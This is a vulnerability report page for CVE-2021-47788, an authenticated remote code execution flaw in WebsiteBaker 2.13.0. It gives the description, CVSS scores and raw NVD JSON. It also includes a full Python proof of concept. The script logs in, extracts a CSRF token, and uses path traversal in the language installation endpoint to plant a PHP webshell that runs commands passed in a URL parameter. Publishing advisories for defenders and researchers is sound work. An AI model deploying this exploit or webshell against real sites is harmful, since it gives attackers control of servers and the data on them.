Security Vulnerability Report
CVE-2021-47788 CVSS 8.8 HIGH

CVE-2021-47788

Published: 2026-01-16 00:16:22
Last Modified: 2026-01-30 01:02:29

Description

WebsiteBaker 2.13.0 contains an authenticated remote code execution vulnerability that allows users with language editing permissions to execute arbitrary code. Attackers can exploit the language installation endpoint by manipulating language installation parameters to achieve remote code execution on the server.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:websitebaker:websitebaker:2.13.0:*:*:*:*:*:*:* - VULNERABLE
WebsiteBaker CMS 2.13.0 and all earlier versions (note: the NVD CPE configuration above matches version 2.13.0 only; earlier versions are not confirmed by that CPE entry)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2021-47788 PoC - WebsiteBaker Authenticated RCE via Language Installation # Target: WebsiteBaker CMS <= 2.13.0 # Requirement: Valid account with language editing permissions import requests import re from urllib.parse import urlencode TARGET_URL = "http://target-website.com/websitebaker" USERNAME = "attacker" PASSWORD = "password123" session = requests.Session() def login(): """Authenticate to WebsiteBaker with valid credentials""" login_url = f"{TARGET_URL}/admin/login/index.php" login_data = { 'username_fieldname': USERNAME, 'password_fieldname': PASSWORD, 'username': USERNAME, 'password': PASSWORD } response = session.post(login_url, data=login_data) return 'wb_user_id' in session.cookies def get_csrf_token(): """Extract CSRF token from language settings page""" lang_url = f"{TARGET_URL}/admin/languages/index.php" response = session.get(lang_url) match = re.search(r'name="[\w]+token[\w]*"[\s]+value="([a-f0-9]+)"', response.text) return match.group(1) if match else None def exploit(csrf_token): """Execute RCE by injecting PHP code via language installation""" # PHP webshell payload webshell = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>" exploit_url = f"{TARGET_URL}/admin/languages/save.php" exploit_data = { 'type': 'install', 'action': 'save', 'security_token': csrf_token, # Exploit: Inject PHP code into language file path 'name': 'rce_lang', 'code': webshell, # Write to web-accessible directory 'path': '../../../modules/rce.php' } response = session.post(exploit_url, data=exploit_data) return f"{TARGET_URL}/modules/rce.php?cmd=whoami" in str(response.content) def main(): print("[*] Starting CVE-2021-47788 exploitation...") if not login(): print("[-] Authentication failed") return print("[+] Login successful") token = get_csrf_token() if not token: print("[-] Failed to obtain CSRF token") return print(f"[+] CSRF token obtained: {token}") if exploit(token): print("[+] RCE payload deployed successfully!") print(f"[+] Webshell accessible at: 
{TARGET_URL}/modules/rce.php") else: print("[-] Exploitation failed") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47788", "sourceIdentifier": "[email protected]", "published": "2026-01-16T00:16:22.263", "lastModified": "2026-01-30T01:02:28.600", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WebsiteBaker 2.13.0 contains an authenticated remote code execution vulnerability that allows users with language editing permissions to execute arbitrary code. Attackers can exploit the language installation endpoint by manipulating language installation parameters to achieve remote code execution on the server."}, {"lang": "es", "value": "WebsiteBaker 2.13.0 contiene una vulnerabilidad de ejecución remota de código autenticada que permite a usuarios con permisos de edición de idioma ejecutar código arbitrario. Los atacantes pueden explotar el endpoint de instalación de idioma manipulando los parámetros de instalación de idioma para lograr la ejecución remota de código en el servidor."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": 
"NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:websitebaker:websitebaker:2.13.0:*:*:*:*:*:*:*", "matchCriteriaId": "B5920127-998B-4E06-915A-7C4C739A4BF8"}]}]}], "references": [{"url": "https://websitebaker.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/50310", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/websitebaker-remote-code-execution-rce-authenticated", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/50310", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "VDB Entry"]}]}}